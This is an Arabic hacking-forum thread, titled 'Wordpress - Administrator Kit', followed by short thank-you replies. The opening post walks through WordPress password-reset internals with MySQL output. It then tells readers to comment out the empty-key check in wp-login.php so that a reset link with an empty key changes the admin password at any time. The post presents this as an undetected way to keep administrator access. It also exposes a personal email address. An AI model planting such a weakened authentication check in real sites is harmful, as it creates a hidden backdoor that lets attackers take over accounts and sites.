الوسوم:
حالة الموضوع:
مغلق
  1. Hacker-DZ

    Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [INFO]Wordpress - Administrator Kit[/INFO]

    السلام عليكم ورحمة الله وبركـاته :{1}:

    كيف احوالكم ؟ i:q2^:

    اليوم موضوعنا عن الورد بريس وفكرة العودة بصلاحية ادمن بدون اكواد خبيثة وتنكشف :{13}:

    الورد بريس ببساطة سكربت تدوين ,,, ويعتمد على نظام الادارة WP-ADMIN

    من خلال يوزر نيم وباسورد

    لكن لو نسينا الباسورد ؟؟ شو الحل *:"

    الحل بالشكل التقليدي هو استعادة كلمة المرور ...

    السوال القوي ~ وما هي ألية استعادة البـاسورد ؟؟

    الالية بسيطة هنالك في جدول اليوزرات عمود اسمه

    user_activation_key

    هذا العمود لازم تكون فيه قيمة عشوائية تضعها الورد بريس

    اذا فيه قيمة = هنالك احد طلب استعادة لكلمة المرور

    اذا مافيه قيمة = لم يطلب احد الاستعادة

    طيب رائع ,, بعد الحصول على تلك القيمة او الـ Key راح نروح نضعه في الورد بريس

    بهذا الرابط

    كود PHP:
    Wordpress/wp-login.php?key=XXXXX&login=admin
    وزي ما بنلاحظ في هنالك Parameter اخر هو Login والذي يحدد الـيوزر نيم المراد تغيير كلمة مروره

    طيب نحن قلنا فوق انو لو ما في قيمة داخل user_activation_key

    يعني ما أحد طلب استعادة ,, ماذا لو خلينا الـ Key فارغ*:" في الرابط

    خلينا نشوف التجربة مع بعض

    كود PHP:
    mysqlshow tables;
    +-----------------------+
    Tables_in_wp          |
    +-----------------------+
    wp_commentmeta        
    wp_comments           
    wp_links              
    wp_options            
    wp_postmeta           
    wp_posts              
    wp_term_relationships 
    wp_term_taxonomy      
    wp_terms              
    wp_usermeta           
    wp_users              
    +-----------------------+
    11 rows in set (0.00 sec)


    mysqlselect from wp_users;
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    ID user_login user_pass                          user_nicename |  user_email                user_url user_registered     |  user_activation_key user_status display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    |  
    admin      XXXXX. | admin         the.dead.man-@hotmail.com |          | 2013-02-09 19:15:59 |                     |           admin        
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    1 row in set (0.00 sec)

    mysqlselect user_activation_key  from wp_users;
    +---------------------+
    user_activation_key |
    +---------------------+
    |                     | 
    +---------------------+
    1 row in set (0.00 sec)

    mysql>
    طبعا هاي الـ Query'z تظهر ان قيمة الـ Key فارغة

    الان نروح نطلب استعادة لكلمة المرور

    [​IMG]

    نلاحظ قيمة الـ Key

    كود PHP:
    mysqlselect user_activation_key  from wp_users;
    +----------------------+
    user_activation_key  |
    +----------------------+
    Y8uF04mZiaCZob8UCMy5 
    +----------------------+
    1 row in set (0.00 sec)
    الان هنروح للرابط

    كود PHP:
    http://iq-team.org/Wordpress/wp-login.php?key=Y8uF04mZiaCZob8UCMy5&login=admin
    [​IMG]


    وهتدخل كلمة مرور وهيمشي طبيعي جدا *:"

    الان لو رجعنا لـ wp-login.php

    كود PHP:
    function check_password_reset_key($key$login) {
        global 
    $wpdb;

        
    $key preg_replace('/[^a-z0-9]/i'''$key);

        if ( empty( 
    $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        if ( empty(
    $login) || !is_string($login) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        
    $user $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s AND user_login = %s"$key$login));

        if ( empty( 
    $user ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        return 
    $user;
    }
    المشكلة في الكود تبع الـ Empty

    كود PHP:
    if ( empty( $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));
    نضيف قبلهم // للسطرين علشان نقدر نغير كلمة المرور في أي وقت بشرط ان لا تقوم بطلبها من نموذج الاستعادة علشان ما يكون في قيمة داخل Key

    [​IMG]
    &:":&:":&:":
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. 3mran

    3mran Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    8
    رد: Wordpress - Administrator Kit

    بارك الله فيك ..~


    واصل من دون فواصل ..~
     
  4. .ılı.Iяẫqi.ılı.

    .ılı.Iяẫqi.ılı. DeveloPer Plus

    الأنتساب:
    ‏22 ديسمبر 2012
    المشاركات:
    144
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    IraQ
    رد: Wordpress - Administrator Kit

    السلام عليكم
    موضوع مميز
    بارك الله فيك
     
  5. 9max99

    9max99 Developer

    الأنتساب:
    ‏10 نوفمبر 2011
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طالب
    الإقامة:
    مكة المكرمة ~
    رد: Wordpress - Administrator Kit

    السلام عليكم ورحمة الله وبركاته
    .................................................. ....
    بارك الله فيك اخي على الجهد والموضوع الرائع &:":​
     
  6. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: Wordpress - Administrator Kit

    سلمت يُمناك استاذنا ..​
     
  7. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: Wordpress - Administrator Kit

    عليكم السلام
    مشكور حبي شرح رائع
    موفق حبيبي &:":​
     
  8. صانع السلالم

    صانع السلالم DeveloPer Plus

    الأنتساب:
    ‏1 أكتوبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    الإقامة:
    missing-team
    رد: Wordpress - Administrator Kit

    بارك الله فيك
    تم التقييم
    تقبل مروري
    بالتوفيق
    :{1}:​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة